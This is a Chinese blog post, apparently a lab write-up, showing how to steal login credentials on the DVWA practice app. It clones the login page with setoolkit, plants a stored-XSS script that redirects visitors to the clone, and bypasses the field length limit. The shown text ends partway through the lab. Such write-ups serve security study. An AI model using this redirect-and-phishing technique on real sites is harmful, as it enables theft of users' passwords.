<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#6200ee"><meta name="author" content="m0re"><meta name="copyright" content="m0re"><meta name="generator" content="Hexo 5.1.0"><meta name="theme" content="hexo-theme-yun"><title>XSS盗取用户信息实验及xss之旅闯关 | m0re的小站</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.24/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_j5gk85dg4pf.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link id="light-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism.css" media="(prefers-color-scheme: light)"><link id="dark-prism-css" rel="stylesheet" href="https://cdn.jsdelivr.net/npm/prismjs@latest/themes/prism-tomorrow.css" media="(prefers-color-scheme: dark)"><link rel="icon" href="/m0re.ico"><link rel="mask-icon" href="/m0re.ico" color="#6200ee"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"m0re.top","root":"/","title":"人生路漫漫","version":"1.6.1","mode":"time","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"local_search":{"path":"/search.xml"},"fireworks":{"colors":["102, 167, 221","62, 131, 225","33, 78, 194"]}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/utils.js"></script><script src="/js/hexo-theme-yun.js"></script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="前言近段时间学习xss，进行了比较详细的了解，也学了一个小实验，感觉挺有意思，记录下来。然后，后面就是xss之旅的闯关。 xss盗取用户信息小实验实验环境DVWA、kali linux、物理机或一台windows系统的虚拟机。 实验实验原理：克隆网站登录页面，利用存储xss设置跳转代码，如果用户访问即跳转到克隆网站的登录页面，用户输入登录，账号和密码被存储。我画的图。咳咳，太丑了，使用setool">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS盗取用户信息实验及xss之旅闯关">
<meta property="og:url" content="https://m0re.top/posts/117d2c7d/index.html">
<meta property="og:site_name" content="m0re的小站">
<meta property="og:description" content="前言近段时间学习xss，进行了比较详细的了解，也学了一个小实验，感觉挺有意思，记录下来。然后，后面就是xss之旅的闯关。 xss盗取用户信息小实验实验环境DVWA、kali linux、物理机或一台windows系统的虚拟机。 实验实验原理：克隆网站登录页面，利用存储xss设置跳转代码，如果用户访问即跳转到克隆网站的登录页面，用户输入登录，账号和密码被存储。我画的图。咳咳，太丑了，使用setool">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502173613895.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502174034632.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502173931344.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502174434439.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502174705691.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502175937153.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020050218011736.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020050218065686.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502181803475.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502182830554.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502181911837.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502181926710.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200502182033363.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200503172340635.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200503172424813.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200503172646989.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200503172811593.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200503172839194.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506153538350.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506154047475.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506154529785.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506154318602.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506154212719.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506155049670.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506162150941.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506162328765.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506163700295.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506164055341.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506164235773.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506164949929.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200506171517900.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020051110511482.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2020051111233829.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200511113926227.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200529224510949.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200529224634161.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200529224853425.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200529230142530.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2020-08-23T08:31:57.627Z">
<meta property="article:modified_time" content="2020-09-01T07:51:18.732Z">
<meta property="article:author" content="m0re">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200502173613895.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="m0re"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="m0re"><span class="site-author-status" title="穷鬼啊啊啊啊">😭</span></a><div class="site-author-name"><a href="/about/">m0re</a></div><span class="site-name">m0re的小站</span><sub class="site-subtitle"></sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">118</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">19</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">50</span></a></div><a class="site-state-item hty-icon-button" href="/Tools/" title="Tools"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/zxcv0221" title="GitHub" target="_blank" style="color:#181717"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" title="哔哩哔哩动画" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://twitter.com/ISm0r3" title="Twitter" target="_blank" style="color:#1da1f2"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-twitter-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:m0re.lxj@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xss%E7%9B%97%E5%8F%96%E7%94%A8%E6%88%B7%E4%BF%A1%E6%81%AF%E5%B0%8F%E5%AE%9E%E9%AA%8C"><span class="toc-number">2.</span> <span class="toc-text">xss盗取用户信息小实验</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E7%8E%AF%E5%A2%83"><span class="toc-number">2.1.</span> <span class="toc-text">实验环境</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C"><span class="toc-number">2.2.</span> <span class="toc-text">实验</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%9E%E9%AA%8C%E8%BF%87%E7%A8%8B"><span class="toc-number">2.3.</span> <span class="toc-text">实验过程</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xss%E4%B9%8B%E6%97%85"><span class="toc-number">3.</span> <span class="toc-text">xss之旅</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%B8%80%E5%85%B3"><span class="toc-number">3.1.</span> <span class="toc-text">第一关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%BA%8C%E5%85%B3"><span class="toc-number">3.2.</span> <span class="toc-text">第二关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%B8%89%E5%85%B3"><span class="toc-number">3.3.</span> <span class="toc-text">第三关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E5%9B%9B%E5%85%B3"><span class="toc-number">3.4.</span> <span class="toc-text">第四关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%BA%94%E5%85%B3"><span class="toc-number">3.5.</span> <span class="toc-text">第五关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E5%85%AD%E5%85%B3"><span class="toc-number">3.6.</span> <span class="toc-text">第六关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%B8%83%E5%85%B3"><span class="toc-number">3.7.</span> <span class="toc-text">第七关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E5%85%AB%E5%85%B3"><span class="toc-number">3.8.</span> <span class="toc-text">第八关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E4%B9%9D%E5%85%B3"><span class="toc-number">3.9.</span> <span class="toc-text">第九关</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%AC%AC%E5%8D%81%E5%85%B3"><span class="toc-number">3.10.</span> <span class="toc-text">第十关</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#xss%E6%B3%A8%E5%85%A5%E7%95%AA%E5%A4%96"><span class="toc-number">4.</span> <span class="toc-text">xss注入番外</span></a></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="https://m0re.top/posts/117d2c7d/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="m0re"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="m0re的小站"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">XSS盗取用户信息实验及xss之旅闯关</h1><div class="post-meta"><div class="post-time" style="display:inline-block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <span class="post-meta-icon-text">发表于</span> <time title="创建时间：2020-08-23 16:31:57" itemprop="dateCreated datePublished" datetime="2020-08-23T16:31:57+08:00">2020-08-23</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-2-line"></use></svg></span> <span class="post-meta-icon-text">更新于</span> <time title="修改时间：2020-09-01 15:51:18" itemprop="dateModified" datetime="2020-09-01T15:51:18+08:00">2020-09-01</time></div><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><span class="leancloud_visitors" id="/posts/117d2c7d/" data-flag-title="XSS盗取用户信息实验及xss之旅闯关"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span class="leancloud-visitors-count"></span></span></span><div class="post-classify"><span class="post-tag"><a class="tag-item" href="/tags/Web/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">Web</span></a><a class="tag-item" href="/tags/XSS/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">XSS</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#6200ee;"><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>近段时间学习xss，进行了比较详细的了解，也学了一个小实验，感觉挺有意思，记录下来。然后，后面就是xss之旅的闯关。</p>
<h1 id="xss盗取用户信息小实验"><a href="#xss盗取用户信息小实验" class="headerlink" title="xss盗取用户信息小实验"></a>xss盗取用户信息小实验</h1><h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h2><p>DVWA、kali linux、物理机或一台windows系统的虚拟机。</p>
<h2 id="实验"><a href="#实验" class="headerlink" title="实验"></a>实验</h2><p>实验原理：<br>克隆网站登录页面，利用存储xss设置跳转代码，如果用户访问即跳转到克隆网站的登录页面，用户输入登录，账号和密码被存储。<br>我画的图。咳咳，太丑了，<img src="https://img-blog.csdnimg.cn/20200502173613895.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="j4y" loading="lazy"><br>使用setoolkit工具克隆网站<br>setoolkit是一个kali自带的工具，要在root权限下使用。<br>使用工具克隆好网站后，去靶场插入xss存储型代码。<br>等待用户点击……<br>查看账户密码等信息。</p>
<h2 id="实验过程"><a href="#实验过程" class="headerlink" title="实验过程"></a>实验过程</h2><p>打开DVWA，复制一下这个登录页面的url，(这个是个在线的靶场，不知道哪位好心人搭建的。IP就不打码了，想尝试一下的也可以用这个试一下。）<br><img src="https://img-blog.csdnimg.cn/20200502174034632.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>登陆进去，先清理一下数据库记录(可有可无)<br><img src="https://img-blog.csdnimg.cn/20200502173931344.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>打开kali终端<br>root用户登陆的话就输入 <code>setoolkit</code><br>普通用户就输入<code>sudo setoolkit</code>  回车<br><img src="https://img-blog.csdnimg.cn/20200502174434439.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>然后输入<code>1</code>回车<br>输入<code>2</code>回车<br>输入<code>3</code>回车<br>输入<code>2</code>回车<br>然后出现这样的页面，打码的地方是我的IP地址，<br><img src="https://img-blog.csdnimg.cn/20200502174705691.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>然后敲下回车键，就会提示让输入url，这个时候，将刚复制的DVWA的登录页面的URL输入进去，回车，出现这样的页面<br><img src="https://img-blog.csdnimg.cn/20200502175937153.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>下一步打开kali的浏览器，输入我的虚拟机的IP地址，<br><img src="https://img-blog.csdnimg.cn/2020050218011736.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>发现是这样的，证明克隆成功。<br>登陆进去，到存储型xss处插入代码<br><code>&lt;script&gt;window.location=&quot;http://***.***.**.***&lt;/script&gt;</code><br>这里有长度限制，就f12改一下。<br><img src="https://img-blog.csdnimg.cn/2020050218065686.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"><br>然后在win7虚拟机上进行登录</p>
